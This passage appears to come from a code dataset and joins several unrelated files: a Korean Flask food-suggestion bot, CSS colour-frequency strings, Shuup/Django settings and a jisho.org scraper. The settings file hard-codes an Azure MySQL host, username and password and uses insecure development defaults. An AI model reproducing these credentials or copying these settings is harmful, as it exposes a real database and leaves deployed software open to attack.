    Expects JSON {"content": "<budget>"}. For a recognized budget the bot asks
    the user to pick a cuisine; otherwise it re-prompts for a valid budget.
    Returns the reply as a JSON string (ensure_ascii=False keeps the Korean
    text readable on the wire).
    """
    data = json.loads(request.data)
    content = data['content']
    # The three budget tiers all produced the identical prompt, so the
    # copy-pasted if/elif chain is collapsed into one membership test.
    if content in ('5000', '10000', '15000'):
        text1 = '한식, 중식, 일식 중에 고르세요.'
    else:
        text1 = '5000, 10000, 15000 중에서 입력하세요.'
    response = {
        "message" : {
            "text": text1
        }
    }
    return json.dumps(response, ensure_ascii=False)
'''
@app.route('/message', methods=['POST'])
def message2():
data2 = json.loads(request.data2)
content2 = data2['content2']
if content2 == str('한식'):
food1 = '된장찌개'
elif content2 == str('중식'):
food1 = '짜장면'
elif content2 == str('일식'):
food1 = '라멘'
else:
food1 = '한식, 중식, 일식 중에 고르세요.'
response2 = {
"message2" : {
"food": food1
}
}
'''
if __name__ == '__main__':
    # NOTE(review): port 600 is a privileged port (<1024) and unusual for a
    # Flask app — possibly a typo for 5000/6000; confirm before deploying.
    app.run(host='0.0.0.0', port=600)
12,783 | 60f6ceb4b5d1cbdd74a99f076cfe5a68e2cf1c43 | supplier_bg_color = """background-color: #000 \9;
1
background-color: #000;
2
background-color: #0e3e5e;
1
background-color: #117bab;
3
background-color: #145c8b;
4
background-color: #169cd9;
9
background-color: #21c4f3;
1
background-color: #31708f;
2
background-color: #323232;
5
background-color: #333;
6
background-color: #357ebd;
1
background-color: #3c763d;
2
background-color: #4f8d37;
7
background-color: #5e5e5e;
1
background-color: #64b245;
26
background-color: #6f2418;
3
background-color: #777;
3
background-color: #8a6d3b;
2
background-color: #993121;
6
background-color: #a94442;
2
background-color: #aaa;
1
background-color: #afd9ee;
1
background-color: #c1e2b3;
1
background-color: #c4e3f3;
2
background-color: #d0e9c6;
2
background-color: #d9edf7;
5
background-color: #db8905;
3
background-color: #dff0d8;
6
background-color: #e4b9b9;
1
background-color: #e5e5e5;
2
background-color: #e6e6e6;
2
background-color: #e8e8e8;
2
background-color: #ebcccc;
2
background-color: #ebebeb;
1
background-color: #eee;
9
background-color: #efefef;
4
background-color: #f2dede;
6
background-color: #f5f5f5;
11
background-color: #f7ecb5;
1
background-color: #f7f7f7;
1
background-color: #f9f2f4;
1
background-color: #f9f9f9;
1
background-color: #faa419;
6
background-color: #faf2cc;
2
background-color: #fafafa;
1
background-color: #fcf8e3;
7
background-color: #fff !important;
1
background-color: #fff;
36
background-color: '{{accent-700}}';
1
background-color: '{{accent-A700}}';
2
background-color: '{{accent-color}}';
8
background-color: '{{background-200}}';
1
background-color: '{{background-500-0.2}}';
2
background-color: '{{background-50}}';
2
background-color: '{{foreground-4}}';
1
background-color: '{{primary-600}}';
1
background-color: '{{primary-color}}';
4
background-color: '{{warn-700}}';
1
background-color: '{{warn-color-0.26}}';
4
background-color: '{{warn-color}}';
4
background-color: rgb(100,178,84);
10
background-color: rgb(129,199,132);
10
background-color: rgb(143,206,242);
14
background-color: rgb(158,158,158);
4
background-color: rgb(181,219,165);
10
background-color: rgb(187,222,251);
8
background-color: rgb(189,189,189);
4
background-color: rgb(198,40,40);
10
background-color: rgb(200,230,201);
4
background-color: rgb(211,47,47);
4
background-color: rgb(22,156,217);
26
background-color: rgb(224,224,224);
9
background-color: rgb(229,115,115);
10
background-color: rgb(238,238,238);
4
background-color: rgb(244,67,54);
10
background-color: rgb(245,245,245);
4
background-color: rgb(250,250,250);
20
background-color: rgb(255,138,128);
10
background-color: rgb(255,205,210);
8
background-color: rgb(255,255,255);
9
background-color: rgb(33,33,33);
9
background-color: rgb(46,125,50);
10
background-color: rgb(64,157,227);
14
background-color: rgb(66,66,66);
9
background-color: rgb(98,182,235);
14
background-color: rgb(99,184,83);
4
background-color: rgba(0,0,0,0);
1
background-color: rgba(0,0,0,0.12);
20
background-color: rgba(0,0,0,0.26);
12
background-color: rgba(0,0,0,0.54);
8
background-color: rgba(100,178,84,0.26);
3
background-color: rgba(100,178,84,0.5);
1
background-color: rgba(100,178,84,0.87);
2
background-color: rgba(129,199,132,0.26);
3
background-color: rgba(129,199,132,0.5);
1
background-color: rgba(129,199,132,0.87);
2
background-color: rgba(143,206,242,0.26);
3
background-color: rgba(143,206,242,0.5);
1
background-color: rgba(143,206,242,0.87);
2
background-color: rgba(158,158,158,0.2);
8
background-color: rgba(181,219,165,0.26);
3
background-color: rgba(181,219,165,0.5);
1
background-color: rgba(181,219,165,0.87);
2
background-color: rgba(198,40,40,0.26);
2
background-color: rgba(198,40,40,0.5);
1
background-color: rgba(198,40,40,0.87);
2
background-color: rgba(22,156,217,0.26);
3
background-color: rgba(22,156,217,0.5);
1
background-color: rgba(22,156,217,0.87);
2
background-color: rgba(229,115,115,0.26);
2
background-color: rgba(229,115,115,0.5);
1
background-color: rgba(229,115,115,0.87);
2
background-color: rgba(244,67,54,0.26);
2
background-color: rgba(244,67,54,0.5);
1
background-color: rgba(244,67,54,0.87);
2
background-color: rgba(255,138,128,0.26);
2
background-color: rgba(255,138,128,0.5);
1
background-color: rgba(255,138,128,0.87);
2
background-color: rgba(46,125,50,0.26);
3
background-color: rgba(46,125,50,0.5);
1
background-color: rgba(46,125,50,0.87);
2
background-color: rgba(64,157,227,0.26);
3
background-color: rgba(64,157,227,0.5);
1
background-color: rgba(64,157,227,0.87);
2
background-color: rgba(98,182,235,0.26);
3
background-color: rgba(98,182,235,0.5);
1
background-color: rgba(98,182,235,0.87);
2
background-color: transparent !important;
1
background-color: transparent;
41
background-color: white;
1
"""
supplier_text_color = """
color: #000 !important;
1
color: #000;
3
color: #08c;
1
color: #09c;
1
color: #0f6a94;
4
color: #169cd9;
11
color: #245269;
2
color: #262626;
1
color: #2b542c;
2
color: #31708f;
7
color: #333;
16
color: #3c763d;
10
color: #3f3f3f;
3
color: #444;
6
color: #457b30;
2
color: #4f8d37;
1
color: #555;
8
color: #64b245;
14
color: #66512c;
2
color: #727272;
1
color: #737373;
2
color: #777;
20
color: #843534;
2
color: #8a6d3b;
9
color: #8c8c8c;
1
color: #993121;
6
color: #999;
5
color: #B1B1B2;
1
color: #CCCCCC;
2
color: #a94442;
10
color: #aaa;
1
color: #b1b1b1;
1
color: #b2b2b2;
1
color: #c1e1f6;
2
color: #c7254e;
1
color: #ccc;
4
color: #d9edf7;
1
color: #dcefd4;
1
color: #dff0d8;
1
color: #e6e6e6;
1
color: #eee;
2
color: #f2dede;
1
color: #f5f5f5;
1
color: #faa419;
3
color: #fcf8e3;
1
color: #fff;
88
color: '{{accent-100}}';
3
color: '{{accent-A200}}';
1
color: '{{accent-color}}';
3
color: '{{accent-contrast}}';
8
color: '{{background-50}}';
2
color: '{{background-contrast}}';
2
color: '{{foreground-2}}';
1
color: '{{foreground-3}}';
3
color: '{{primary-100}}';
2
color: '{{primary-600-1}}';
2
color: '{{primary-A200}}';
1
color: '{{primary-color}}';
4
color: '{{primary-contrast}}';
4
color: '{{warn-100}}';
2
color: '{{warn-A200}}';
1
color: '{{warn-color}}';
2
color: '{{warn-contrast}}';
4
color: currentColor;
1
color: inherit;
16
color: rgb(100,178,84);
19
color: rgb(117,117,117);
12
color: rgb(129,199,132);
7
color: rgb(143,206,242);
6
color: rgb(148,202,122);
4
color: rgb(181,219,165);
7
color: rgb(187,222,251);
12
color: rgb(189,189,189);
4
color: rgb(198,40,40);
4
color: rgb(200,230,201);
8
color: rgb(22,156,217);
6
color: rgb(229,115,115);
4
color: rgb(229,57,53);
8
color: rgb(244,67,54) !important;
4
color: rgb(244,67,54);
20
color: rgb(250,250,250);
8
color: rgb(255,138,128);
4
color: rgb(255,205,210);
8
color: rgb(255,255,255);
50
color: rgb(255,82,82);
4
color: rgb(33,33,33);
4
color: rgb(46,125,50);
7
color: rgb(64,157,227);
18
color: rgb(66,66,66);
4
color: rgb(98,182,235);
18
color: rgb(99,184,83);
12
color: rgba(0,0,0,0.26);
36
color: rgba(0,0,0,0.54);
32
color: rgba(0,0,0,0.87);
78
color: rgba(100,178,84,0.87);
1
color: rgba(129,199,132,0.87);
1
color: rgba(143,206,242,0.87);
1
color: rgba(181,219,165,0.87);
1
color: rgba(198,40,40,0.87);
1
color: rgba(22,156,217,0.87);
1
color: rgba(229,115,115,0.87);
1
color: rgba(244,67,54,0.87);
1
color: rgba(255,138,128,0.87);
1
color: rgba(255,255,255,0.87);
20
color: rgba(46,125,50,0.87);
1
color: rgba(64,157,227,0.87);
1
color: rgba(98,182,235,0.87);
1
color: rgba(99,184,83,1);
8
color: transparent;
2
"""
|
12,784 | 829412b14314de5977ae3f3b788d37a15fa82644 | import os
from shuup.addons import add_enabled_addons
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = "Shhhhh"
DEBUG = True
ALLOWED_HOSTS = ["*"]
MEDIA_ROOT = os.path.join(BASE_DIR, "var", "media")
STATIC_ROOT = os.path.join(BASE_DIR, "var", "static")
MEDIA_URL = "/media/"
SHUUP_ENABLED_ADDONS_FILE = os.path.join(BASE_DIR, "var", "enabled_addons")
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.AllowAny',
)
}
INSTALLED_APPS = add_enabled_addons(SHUUP_ENABLED_ADDONS_FILE, [
# django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
# external apps that needs to be loaded before Shuup
'easy_thumbnails',
# shuup themes
'shuup.themes.classic_gray',
# shuup
'shuup.core',
'shuup.admin',
'shuup.addons',
'shuup.default_tax',
'shuup.front',
'shuup.front.apps.auth',
'shuup.front.apps.carousel',
'shuup.front.apps.customer_information',
'shuup.front.apps.personal_order_history',
'shuup.front.apps.saved_carts',
'shuup.front.apps.registration',
'shuup.front.apps.simple_order_notification',
'shuup.front.apps.simple_search',
'shuup.front.apps.recently_viewed_products',
'shuup.notify',
'shuup.simple_cms',
'shuup.customer_group_pricing',
'shuup.campaigns',
'shuup.simple_supplier',
'shuup.order_printouts',
'shuup.utils',
'shuup.xtheme',
'shuup.reports',
'shuup.default_reports',
'shuup.regions',
'shuup.importer',
'shuup.default_importer',
'shuup.gdpr',
'shuup.tasks',
'shuup.discounts',
# External Shuup addons
'shuup_api',
'shuup_rest_api',
# external apps
'bootstrap3',
'django_countries',
'django_jinja',
'django_filters',
'filer',
'reversion',
'registration',
'rest_framework',
'rest_framework_swagger'
])
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'shuup.front.middleware.ProblemMiddleware',
'shuup.core.middleware.ShuupMiddleware',
'shuup.front.middleware.ShuupFrontMiddleware',
'shuup.xtheme.middleware.XthemeMiddleware',
'shuup.admin.middleware.ShuupAdminMiddleware'
]
ROOT_URLCONF = 'shuup_workbench.urls'
WSGI_APPLICATION = 'shuup_workbench.wsgi.application'
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
# Azure Database for MySQL connection.
# SECURITY NOTE(review): live credentials are hard-coded in source control
# here — they should be loaded from environment variables or a secrets store,
# and the values below must be treated as compromised and rotated.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'osm',
        'USER': 'gaussianapple@oms-db',
        'PASSWORD': 'zeaPX2XDTymB',
        'HOST': 'oms-db.mysql.database.azure.com',
        'PORT': '3306',
    }
}
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = '/'
DEFAULT_FROM_EMAIL = 'no-reply@example.com'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
LOGGING = {
'version': 1,
'formatters': {
'verbose': {'format': '[%(asctime)s] (%(name)s:%(levelname)s): %(message)s'},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
},
'loggers': {
'shuup': {'handlers': ['console'], 'level': 'DEBUG', 'propagate': True},
}
}
LANGUAGES = [
# List all supported languages here.
#
# Should be a subset of django.conf.global_settings.LANGUAGES. Use
# same spelling for the language names for utilizing the language
# name translations from Django.
('en', 'English'),
('fi', 'Finnish'),
('it', 'Italian'),
('ja', 'Japanese'),
('pt-br', 'Brazilian Portuguese'),
('ru', 'Russian'),
('sv', 'Swedish'),
('zh-hans', 'Simplified Chinese'),
]
PARLER_DEFAULT_LANGUAGE_CODE = "en"
PARLER_LANGUAGES = {
None: [{"code": c, "name": n} for (c, n) in LANGUAGES],
'default': {
'hide_untranslated': False,
}
}
_TEMPLATE_CONTEXT_PROCESSORS = [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.request",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages"
]
TEMPLATES = [
{
"BACKEND": "django_jinja.backend.Jinja2",
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".jinja",
"context_processors": _TEMPLATE_CONTEXT_PROCESSORS,
"newstyle_gettext": True,
"environment": "shuup.xtheme.engine.XthemeEnvironment",
},
"NAME": "jinja2",
},
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": _TEMPLATE_CONTEXT_PROCESSORS,
"debug": DEBUG
}
},
]
# set login url here because of `login_required` decorators
LOGIN_URL = "/login/"
SESSION_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
SHUUP_PRICING_MODULE = "customer_group_pricing"
SHUUP_SETUP_WIZARD_PANE_SPEC = [
"shuup.admin.modules.shops.views:ShopWizardPane",
"shuup.admin.modules.service_providers.views.PaymentWizardPane",
"shuup.admin.modules.service_providers.views.CarrierWizardPane",
"shuup.xtheme.admin_module.views.ThemeWizardPane",
"shuup.testing.modules.sample_data.views.SampleObjectsWizardPane" if DEBUG else "",
"shuup.admin.modules.system.views.TelemetryWizardPane"
]
SHUUP_ERROR_PAGE_HANDLERS_SPEC = [
"shuup.admin.error_handlers:AdminPageErrorHandler",
"shuup.front.error_handlers:FrontPageErrorHandler"
]
SHUUP_SIMPLE_SEARCH_LIMIT = 150
def configure(setup):
    """Shuup workbench hook: commit this settings module's globals via *setup*."""
    setup.commit(globals())
|
12,785 | fa113fc31f920838a747df911c0451fbc59e8512 | import requests
from itertools import zip_longest
from bs4 import BeautifulSoup
from .kana import hiragana, katakana, small_characters, hira2eng, kata2eng
import re
import urllib
import html
import json
ONYOMI_LOCATOR_SYMBOL = 'On'
KUNYOMI_LOCATOR_SYMBOL = 'Kun'
JISHO_API = 'https://jisho.org/api/v1/search/words'
SCRAPE_BASE_URI = 'jisho.org/search/'
STROKE_ORDER_DIAGRAM_BASE_URI = 'https://classic.jisho.org/static/images/stroke_diagrams/'
def remove_new_lines(my_string):
    """Return *my_string* stripped, with all embedded CR/LF characters removed.

    BUG FIX: the original pattern '/(?:\\r|\\n)/g' was a JavaScript regex
    literal copied verbatim; in Python the surrounding slashes and trailing
    'g' are literal characters, so the substitution never matched a bare
    newline. A plain character class does what was intended.
    """
    return re.sub(r'[\r\n]', '', my_string).strip()
def uri_for_search(kanji, filter = "words"):
    """Build the percent-encoded jisho.org search URI for *kanji* under *filter*."""
    search_path = f'{SCRAPE_BASE_URI}{kanji}#{filter}'
    return "https://" + urllib.parse.quote(search_path)
# NOTE(review): classic.jisho.org appears to be gone, so this diagram URI is
# most likely dead — confirm before relying on it.
def getUriForStrokeOrderDiagram(kanji):
    """Return the legacy classic.jisho.org stroke-order diagram URI for *kanji*."""
    codepoint = kanji.encode("unicode-escape").decode("utf-8").replace("\\u", '')
    return STROKE_ORDER_DIAGRAM_BASE_URI + codepoint + '_frames.png'
def uriForPhraseSearch(phrase):
    """Build the official Jisho API search URI for *phrase*."""
    encoded_phrase = urllib.parse.quote(phrase)
    return f'{JISHO_API}?keyword={encoded_phrase}'
def get_string_between_strings(data, start_string, end_string):
    """Return the text between the first *start_string* and the following
    *end_string* in str(data), or None when no such pair exists.

    DOTALL is required because the scraped HTML keeps its newline characters.
    """
    pattern = re.escape(start_string) + '(.*?)' + re.escape(end_string)
    found = re.search(pattern, str(data), re.DOTALL)
    if found is None:
        return None
    return found[1]
def parse_anchors_to_array(my_string):
    """Collect the inner text of every <a href="..."> anchor in *my_string*."""
    anchor_pattern = re.compile(r'<a href=".*?">(.*?)</a>')
    return [match.group(1) for match in anchor_pattern.finditer(my_string)]
def get_gif_uri(kanji):
    """Build the URI of the stroke-order gif for *kanji* in mistval's collection.

    The file name is the kanji's hex escape, e.g. 732b.gif for 猫.
    """
    codepoint = kanji.encode("unicode-escape").decode("utf-8").replace("\\u", '')
    return f'https://raw.githubusercontent.com/mistval/kanji_images/master/gifs/{codepoint}.gif'
def kana_to_halpern(untrans):
    """Transliterate a word written entirely in hiragana or katakana to romaji.

    Consumes the input left to right, taking two characters at a time when the
    second is a small ya/yu/yo (a digraph such as きゃ), otherwise one.
    """
    romaji_parts = []
    remaining = untrans
    while remaining:
        first = remaining[0]
        second = remaining[1] if len(remaining) > 1 else None
        # Pick the lookup table and digraph markers for this script.
        if first in hiragana:
            digraph_marks, table = ("ゃ", "ゅ", "ょ"), hira2eng
        else:
            digraph_marks, table = ("ャ", "ュ", "ョ"), kata2eng
        if second in digraph_marks:
            romaji_parts.append(table[first + second])
            remaining = remaining[2:]
        else:
            romaji_parts.append(table[first])
            remaining = remaining[1:]
    return "".join(romaji_parts)
def contains_kana(word):
    """Return True when *word* contains any hiragana, katakana, or small kana."""
    return any(
        char in hiragana or char in katakana or char in small_characters
        for char in word
    )
kanjiRegex = '[\u4e00-\u9faf\u3400-\u4dbf]'
def get_kanji_and_kana(div):
    """Rebuild the (kanji, kana) forms of an example sentence from its <ul>.

    Each <li> carries the base text (span.unlinked) with optional furigana
    (span.furigana); bare text nodes between <li>s are punctuation shared by
    both renderings.
    """
    ul = div.select_one('ul')
    # contents = ul.contents()
    kanji = ''
    kana = ''
    for child in ul.children:
        if child.name == 'li':
            li = child
            furigana = li.select_one("span.furigana").text if li.select_one("span.furigana") is not None else None
            unlifted = li.select_one("span.unlinked").text if li.select_one("span.unlinked") is not None else None
            if furigana:
                kanji += unlifted
                kana += furigana
                # The furigana only covers the kanji prefix of this chunk;
                # append any trailing non-kanji characters (okurigana) of the
                # base text to the kana rendering as well.
                kanaEnding = []
                for i in reversed(range(len(unlifted))):
                    if not re.search(kanjiRegex, unlifted[i]):
                        kanaEnding.append(unlifted[i])
                    else:
                        break
                kana += ''.join(kanaEnding[::-1])
            else:
                kanji += unlifted
                kana += unlifted
        else:
            # Bare text node (punctuation/particles outside any <li>).
            text = str(child).strip()
            if text:
                kanji += text
                kana += text
    return kanji, kana
def get_pieces(sentenceElement):
    """Extract furigana ('lifted') / base-text ('unlifted') pairs from a sentence node."""
    pieces = []
    for element in sentenceElement.select("li.clearfix") + sentenceElement.select("el"):
        if element.name != 'li':
            pieces.append({'lifted': '', 'unlifted': element.text})
            continue
        furigana_node = element.select_one("span.furigana")
        unlinked_node = element.select_one("span.unlinked")
        pieces.append({
            'lifted': furigana_node.text if furigana_node is not None else '',
            'unlifted': unlinked_node.text if unlinked_node is not None else '',
        })
    return pieces
def parseExampleDiv(div):
    """Parse one example-sentence div into (english, kanji, kana, pieces)."""
    english_text = str(div.select_one('span.english').find(text=True))
    kanji, kana = get_kanji_and_kana(div)
    pieces = get_pieces(div)
    return english_text, kanji, kana, pieces
def parse_example_page_data(pageHtml, phrase):
    """Collect every parsed example sentence on *pageHtml* for *phrase*."""
    sentence_divs = pageHtml.select("div.sentence_content")
    parsed = [parseExampleDiv(div) for div in sentence_divs]
    return {
        'query': phrase,
        'found': bool(parsed),
        'result': parsed,
        'uri': uri_for_search(phrase, filter="sentences"),
        'phrase': phrase
    }
# PHRASE SCRAPE FUNCTIONS START
def get_tags(my_html):
    """Return the text of every word tag (e.g. 'Common word') on the page."""
    return [element.text for element in my_html.select("span.concept_light-tag")]
def get_meanings_other_forms_and_notes(my_html):
    """Walk the meanings column of a Jisho word page.

    Returns a (meanings, other_forms, notes) triple:
      * meanings    -- list of dicts (definition, tags, sentences, supplemental,
                       definitionAbstract, seeAlsoTerms)
      * other_forms -- list of {'kanji': ..., 'kana': ...} alternates
      * notes       -- list of note strings
    """
    otherForms = []
    notes = []
    meaningsWrapper = my_html.select_one(
        '#page_container > div > div > article > div > div.concept_light-meanings.medium-9.columns > div')
    meaningsChildren = meaningsWrapper.children
    meanings = []
    mostRecentWordTypes = []
    for child in meaningsChildren:
        if child.name is None:
            # Robustness: .children can yield bare text nodes (whitespace
            # between tags); they have no attributes and would break the
            # class lookup below.
            continue
        if child.get("class")[0] == 'meaning-tags':
            mostRecentWordTypes = list(map(lambda x: x.strip().lower(), child.text.split(',')))
        elif mostRecentWordTypes[0] == 'other forms':
            otherForms = list(map(lambda y: ({'kanji': y[0], 'kana': y[1]}),
                                  map(lambda x: x.replace('【', '').replace('】', '').split(' '),
                                      child.text.split('、'))))
        elif mostRecentWordTypes[0] == 'notes':
            # BUG FIX: Tag.text is a property, not a method — the original
            # `child.text()` raised TypeError whenever a Notes section existed.
            notes = child.text.split('\n')
        else:
            meaning = child.select_one("span.meaning-meaning").text
            try:
                # Remove the trailing link from the abstract before reading it.
                # BUG FIX: extract() already returns the removed tag; the old
                # trailing `.end()` call raised at runtime and was not covered
                # by the AttributeError handler below.
                child.select_one('.meaning-abstract').select_one('a').extract()
                meaningAbstract = child.select_one('.meaning-abstract').text
            except AttributeError:
                meaningAbstract = ''
            try:
                supplemental = list(filter(lambda y: bool(y),
                                           map(lambda x: x.strip(), child.select_one("span.supplemental_info").text.split(','))))
            except AttributeError:  # no supplemental_info span on this meaning
                supplemental = []
            # Pull 'See also ...' entries out of the supplemental list.
            seeAlsoTerms = []
            for i in reversed(range(len(supplemental))):
                supplementalEntry = supplemental[i]
                if supplementalEntry.startswith('See also'):
                    seeAlsoTerms.append(supplementalEntry.replace('See also ', ''))
                    supplemental.pop(i)
            sentences = []
            sentenceElements = child.select_one("span.sentences > div.sentence") or []
            for sentenceElement in sentenceElements:
                english = sentenceElement.select_one("li.english").text
                pieces = get_pieces(sentenceElement)
                # Drop the English line and all furigana so only the plain
                # Japanese sentence text remains.
                sentenceElement.select_one("li.english").extract()
                for s in sentenceElement.select("span.furigana"):
                    s.extract()
                japanese = sentenceElement.text
                sentences.append({'english': english, 'japanese': japanese, 'pieces': pieces})
            meanings.append({
                'seeAlsoTerms': seeAlsoTerms,
                'sentences': sentences,
                'definition': meaning,
                'supplemental': supplemental,
                'definitionAbstract': meaningAbstract,
                'tags': mostRecentWordTypes,
            })
    return meanings, otherForms, notes
def uri_for_phrase_scrape(searchTerm):
    """Return the jisho.org word-page URI used for phrase scraping."""
    return 'https://jisho.org/word/' + urllib.parse.quote(searchTerm)
def parse_phrase_page_data(pageHtml, query):
    """Scrape a jisho.org word page (*pageHtml*, raw bytes/str) into a result dict."""
    soup = BeautifulSoup(pageHtml, "lxml")
    meanings, other_forms, notes = get_meanings_other_forms_and_notes(soup)
    return {
        'found': True,
        'query': query,
        'uri': uri_for_phrase_scrape(query),
        'tags': get_tags(soup),
        'meanings': meanings,
        'other_forms': other_forms,
        'notes': notes
    }
class Jisho:
"""
A class to interface with Jisho.org and store search results for use.
Stores html results from queries to Jisho.org as an instance variable
and
"""
def __init__(self):
self.html = None
self.response = None
def search_for_phrase(self, phrase):
"""Directly use Jisho's official API to get info on a phrase (can be multiple characters)"""
uri = uriForPhraseSearch(phrase)
return json.loads(requests.get(uri).content)
def search_for_kanji(self, kanji, depth = "shallow"):
"""Return lots of information for a *single* character"""
uri = uri_for_search(kanji, filter="kanji")
self._extract_html(uri)
return self.parse_kanji_page_data(kanji, depth)
def search_for_examples(self, phrase):
"""Return """
uri = uri_for_search(phrase, filter="sentences")
self._extract_html(uri)
return parse_example_page_data(self.html, phrase)
def scrape_for_phrase(self, phrase):
uri = uri_for_phrase_scrape(phrase)
response = requests.get(uri)
return parse_phrase_page_data(response.content, phrase)
def contains_kanji_glyph(self, kanji):
kanjiGlyphToken = f'<h1 class="character" data-area-name="print" lang="ja">{kanji}</h1>'
return kanjiGlyphToken in str(self.html)
def _get_int_between_strings(self, start_string, end_string):
string_between_strings = get_string_between_strings(self.html, start_string, end_string)
return int(string_between_strings) if string_between_strings else None
def _get_newspaper_frequency_rank(self):
frequency_section = get_string_between_strings(self.html, '<div class="frequency">', '</div>')
return get_string_between_strings(frequency_section, '<strong>', '</strong>') if frequency_section else None
def _get_yomi(self, page_html, yomiLocatorSymbol):
yomi_section = get_string_between_strings(self.html, f'<dt>{yomiLocatorSymbol}:</dt>', '</dl>')
return parse_anchors_to_array(yomi_section) or ''
def get_kunyomi(self):
return self._get_yomi(self.html, KUNYOMI_LOCATOR_SYMBOL)
def get_onyomi(self):
return self._get_yomi(self.html, ONYOMI_LOCATOR_SYMBOL)
def _get_yomi_examples(self, yomiLocatorSymbol):
locator_string = f'<h2>{yomiLocatorSymbol} reading compounds</h2>'
example_section = get_string_between_strings(self.html, locator_string, '</ul>')
if not example_section:
return []
regex = r'<li>(.*?)</li>'
regex_results = map(lambda x: x.strip(), re.findall(regex, example_section, re.DOTALL))
for example in regex_results:
example_lines = list(map(lambda x: x.strip(), example.split('\n')))
yield {
'example': example_lines[0],
'reading': example_lines[1].replace('【', '').replace('】', ''),
'meaning': html.unescape(example_lines[2]),
}
def get_onyomi_examples(self):
return self._get_yomi_examples(ONYOMI_LOCATOR_SYMBOL)
def get_kunyomi_examples(self):
return self._get_yomi_examples(KUNYOMI_LOCATOR_SYMBOL)
def get_radical(self):
radicalMeaningStartString = '<span class="radical_meaning">'
radicalMeaningEndString = '</span>'
radicalMeaning = self.html.select_one("span.radical_meaning")
# TODO: Improve this? I don't like all the string finding that much, rather do it with BS finding
if radicalMeaning:
page_html_string = str(self.html)
radicalMeaningStartIndex = page_html_string.find(radicalMeaningStartString)
radicalMeaningEndIndex = page_html_string.find(radicalMeaningEndString, radicalMeaningStartIndex)
radicalSymbolStartIndex = radicalMeaningEndIndex + len(radicalMeaningEndString)
radicalSymbolEndString = '</span>'
radicalSymbolEndIndex = page_html_string.find(radicalSymbolEndString, radicalSymbolStartIndex)
radicalSymbolsString = page_html_string[radicalSymbolStartIndex:radicalSymbolEndIndex].replace("\n", '').strip()
if len(radicalSymbolsString) > 1:
radicalForms = radicalSymbolsString[1:].replace('(', '').replace(')', '').strip().split(', ')
return {'symbol': radicalSymbolsString[0], 'forms': radicalForms, 'meaning': radicalMeaning.string.strip()}
return {'symbol': radicalSymbolsString, 'meaning': radicalMeaning.text.replace("\n", '').strip()}
return None
def get_parts(self):
parts_section = self.html.find("dt", text="Parts:").find_next_sibling('dd')
result = parse_anchors_to_array(str(parts_section))
result.sort()
return result
def get_svg_uri(self):
svg_regex = re.compile(r"var url = \'//(.*?cloudfront\.net/.*?.svg)")
regex_result = svg_regex.search(str(self.html))
return f'https://{regex_result[1]}' if regex_result else None
def parse_kanji_page_data(self, kanji, depth):
result = {'query': kanji, 'found': self.contains_kanji_glyph(kanji)}
if not result['found']:
return result
result['taughtIn'] = get_string_between_strings(self.html, 'taught in <strong>', '</strong>')
result['jlptLevel'] = get_string_between_strings(self.html, 'JLPT level <strong>', '</strong>')
result['newspaperFrequencyRank'] = self._get_newspaper_frequency_rank()
result['strokeCount'] = self._get_int_between_strings('<strong>', '</strong> strokes')
result['meaning'] = html.unescape(
get_string_between_strings(self.html, '<div class="kanji-details__main-meanings">', '</div>')).strip().replace("\n", '')
result['kunyomi'] = self.get_kunyomi()
result['onyomi'] = self.get_onyomi()
result['onyomiExamples'] = list(self.get_onyomi_examples())
result['kunyomiExamples'] = list(self.get_kunyomi_examples())
result['radical'] = self.get_radical()
result['parts'] = self.get_parts()
result['strokeOrderDiagramUri'] = getUriForStrokeOrderDiagram(kanji)
result['strokeOrderSvgUri'] = self.get_svg_uri()
result['strokeOrderGifUri'] = get_gif_uri(kanji)
result['uri'] = uri_for_search(kanji, filter="kanji")
return result
def _extract_html(self, url):
"""With the response, extract the HTML and store it into the object."""
self.response = requests.get(url, timeout=5)
self.html = BeautifulSoup(self.response.content, "lxml") if self.response.ok else None
# return self.html
def search_for_word(self, word, depth="shallow"):
    """Take a japanese word and spit out well-formatted dictionaries for each entry.

    depth="shallow" parses only the first results page; depth="deep"
    additionally follows the "More Words" link until it disappears.
    """
    # self._get_search_response(word)
    self._extract_html(uri_for_search(word))
    results = self.html.select(".concept_light.clearfix")
    # print(results)
    fmtd_results = []
    if depth == "shallow":
        for r in results:
            fmtd_results.append(self._extract_dictionary_information(r))
    elif depth == "deep":
        for r in results:
            fmtd_results.append(self._extract_dictionary_information(r))
        # If there are more than 20 results on the page, there is no "More Words" link
        more = self.html.select_one(".more")
        while more:
            # The link is scheme-relative, hence the "http:" prefix below.
            link = more.get("href")
            response = requests.get(r"http:" + link, timeout=5)
            # NOTE(review): this local `html` shadows the imported `html`
            # module used elsewhere in the class — rename if refactoring.
            html = BeautifulSoup(response.content, "html.parser")
            results = html.select(".concept_light.clearfix")
            for r in results:
                fmtd_results.append(self._extract_dictionary_information(r))
            more = html.select_one(".more")
